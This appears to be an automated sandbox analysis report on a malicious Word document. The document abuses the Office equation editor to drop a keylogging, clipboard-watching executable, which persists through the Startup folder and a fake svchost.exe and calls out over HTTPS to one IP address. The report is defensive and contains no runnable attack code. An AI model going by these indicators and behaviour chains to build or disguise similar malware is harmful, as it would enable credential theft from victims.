                      Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49167 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49168 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49170 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49171 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49172 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49173 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49174 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49175 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49177 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49178 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49179 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49180 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49182 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49183 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49184 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49185 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\AppData\Roaming\srt.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\srt.exe
                      Source: C:\Users\user\AppData\Roaming\srt.exeWindow created: window name: CLIPBRDWNDCLASS
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\srt.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\srt.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\srt.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\srt.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_004CB2EE NtQuerySystemInformation,4_2_004CB2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_004CB2CC NtQuerySystemInformation,4_2_004CB2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_01C2B2EE NtQuerySystemInformation,6_2_01C2B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_01C2B2CC NtQuerySystemInformation,6_2_01C2B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0269B2EE NtQuerySystemInformation,8_2_0269B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0269B2CC NtQuerySystemInformation,8_2_0269B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_020AB2EE NtQuerySystemInformation,10_2_020AB2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_020AB2CC NtQuerySystemInformation,10_2_020AB2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_01D0B2EE NtQuerySystemInformation,13_2_01D0B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_01D0B2CC NtQuerySystemInformation,13_2_01D0B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CFB2EE NtQuerySystemInformation,15_2_01CFB2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CFB2CC NtQuerySystemInformation,15_2_01CFB2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0074B2EE NtQuerySystemInformation,17_2_0074B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0074B2CC NtQuerySystemInformation,17_2_0074B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0058B2EE NtQuerySystemInformation,20_2_0058B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0058B2CC NtQuerySystemInformation,20_2_0058B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0066B2EE NtQuerySystemInformation,22_2_0066B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0066B2CC NtQuerySystemInformation,22_2_0066B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_01D7B2EE NtQuerySystemInformation,25_2_01D7B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_01D7B2CC NtQuerySystemInformation,25_2_01D7B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_01D0B2EE NtQuerySystemInformation,27_2_01D0B2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_01D0B2CC NtQuerySystemInformation,27_2_01D0B2CC
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_01DCB2EE NtQuerySystemInformation,30_2_01DCB2EE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_01DCB2CC NtQuerySystemInformation,30_2_01DCB2CC
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile created: C:\Windows\Resources\Themes\d01f0bR8dD56989Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 3_2_002E04883_2_002E0488
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 3_2_002E0B703_2_002E0B70
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 3_2_002E06913_2_002E0691
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_01F71D454_2_01F71D45
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 12_2_0035048812_2_00350488
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 12_2_00350B0912_2_00350B09
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 12_2_00350B7012_2_00350B70
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 19_2_003C048819_2_003C0488
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 19_2_003C0B7019_2_003C0B70
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 19_2_003C069119_2_003C0691
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_000CDB0824_2_000CDB08
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_0036606024_2_00366060
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_0036544824_2_00365448
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_0036219F24_2_0036219F
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_0036579024_2_00365790
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_00B2C1B824_2_00B2C1B8
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_00B28D2024_2_00B28D20
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_00B2055024_2_00B20550
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_00B25C8024_2_00B25C80
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_00B25C2024_2_00B25C20
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_00B2161824_2_00B21618
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_00B2C79824_2_00B2C798
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_0478004824_2_04780048
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_04781C3024_2_04781C30
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_047821B024_2_047821B0
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_0478102024_2_04781020
                      Source: C:\Users\user\AppData\Roaming\srt.exeCode function: 24_2_047865E024_2_047865E0
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeCode function: 29_2_0054048829_2_00540488
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeCode function: 29_2_00540B7029_2_00540B70
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeCode function: 29_2_0054069129_2_00540691
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 31_2_0014DB0831_2_0014DB08
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 31_2_001C606031_2_001C6060
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 31_2_001C544831_2_001C5448
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 31_2_001C219F31_2_001C219F
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeCode function: 31_2_001C579031_2_001C5790
                      Source: srt.exe, 00000003.00000002.2243284497.0000000007FD0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103261007.0000000002C20000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.adwa.spyw.expl.evad.winDOC@48/23@30/2
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_004CACEE AdjustTokenPrivileges,4_2_004CACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_004CACB7 AdjustTokenPrivileges,4_2_004CACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_01C2ACEE AdjustTokenPrivileges,6_2_01C2ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_01C2ACB7 AdjustTokenPrivileges,6_2_01C2ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0269ACEE AdjustTokenPrivileges,8_2_0269ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0269ACB7 AdjustTokenPrivileges,8_2_0269ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_020AACEE AdjustTokenPrivileges,10_2_020AACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_020AACB7 AdjustTokenPrivileges,10_2_020AACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_01D0ACEE AdjustTokenPrivileges,13_2_01D0ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_01D0ACB7 AdjustTokenPrivileges,13_2_01D0ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CFACEE AdjustTokenPrivileges,15_2_01CFACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 15_2_01CFACB7 AdjustTokenPrivileges,15_2_01CFACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0074ACEE AdjustTokenPrivileges,17_2_0074ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_0074ACB7 AdjustTokenPrivileges,17_2_0074ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0058ACEE AdjustTokenPrivileges,20_2_0058ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_0058ACB7 AdjustTokenPrivileges,20_2_0058ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0066ACEE AdjustTokenPrivileges,22_2_0066ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_0066ACB7 AdjustTokenPrivileges,22_2_0066ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_01D7ACEE AdjustTokenPrivileges,25_2_01D7ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 25_2_01D7ACB7 AdjustTokenPrivileges,25_2_01D7ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_01D0ACEE AdjustTokenPrivileges,27_2_01D0ACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 27_2_01D0ACB7 AdjustTokenPrivileges,27_2_01D0ACB7
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_01DCACEE AdjustTokenPrivileges,30_2_01DCACEE
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_01DCACB7 AdjustTokenPrivileges,30_2_01DCACB7
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$der Confirmation.docJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC052.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....L.......<.......D........v......................0.......#.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....L.......<.......D........v......................0.......#.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....L.......<.......D........v......................0......./.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....L.......<.......D........w......................0......./.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....L.......<.......D.......<w......................0.......;...............|.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....L.......<...............`w......................0.......;.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7........w......................0.......G...............".......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....L.......<................w......................0.......G.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....L.......<................w......................0.......S.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....L.......<................w......................0.......S.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......-.F.o.r.c.e.....L.......<................x......................0......._.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....L.......<.......(.......<x......................0......._.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....L.......<.......(.......gx......................0.......k.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....L.......<.......(........x......................0.......k.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....L.......<.......(........x......................0.......w.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....L.......<.......(........x......................0.......................l.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....L.......<.......(........y......................0...............................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....L.......<.......(.......9y......................0...............................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....L.......<.......(.......Ty......................0...............................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................8........~......................0.......#.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................8........~......................0.......#.......(...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................8...............................0......./.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................8.......-.......................0......./.......(...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................8.......Z.......................0.......;...............|.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................8.......u.......................0.......;.......(...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......(.......".......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................8...............................0.......G.......(...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................8...............................0.......S.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................8...............................0.......S.......(...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................8.......8.......................0......._.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................8.......U.......................0......._.......(...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k.......d...e.x.e. .-.F.o.r.c.e.........8...............................0.......k.......(...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................8...............................0.......k.......(...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................................................0.......w.......(...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0...............(.......2.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................j.......................0...............(...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................8...............................0...............(...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................H...............................0...............(...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H...............................0...............(...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................8.......K.......................0.......#.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................8.......{.......................0.......#.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................8...............................0......./.......................x...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................8...............................0......./.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................8...............................0.......;...............|.......x...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................8....... .......................0.......;.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7...............................0.......G.......X.......".......x...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....................$...............................0.......G.......X...............x...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................$.......q.......................0.......S.......................x...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................$...............................0.......S.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................|...............................0......._.......................x...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................|.......0.......................0......._.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k.......d...e.x.e. .-.F.o.r.c.e.........|...............................0.......k.......X...............x...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....................|...............................0.......k.......X...............x...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................|...............................0.......w.......................x...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................H.......E.......................0.......w.......X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0...............X.......2.......x...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................H.......3.......................0...............X...............x...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................|.......q.......................0.......................l.......x...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................x...............................0...............X...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....................$...............................0...............X...............x...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................!.......................0...............X...............x...............Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................#.......................0.......#.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................[.......................0.......#.......................................Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............................&.......................0......./.......................h...............Jump to behavior
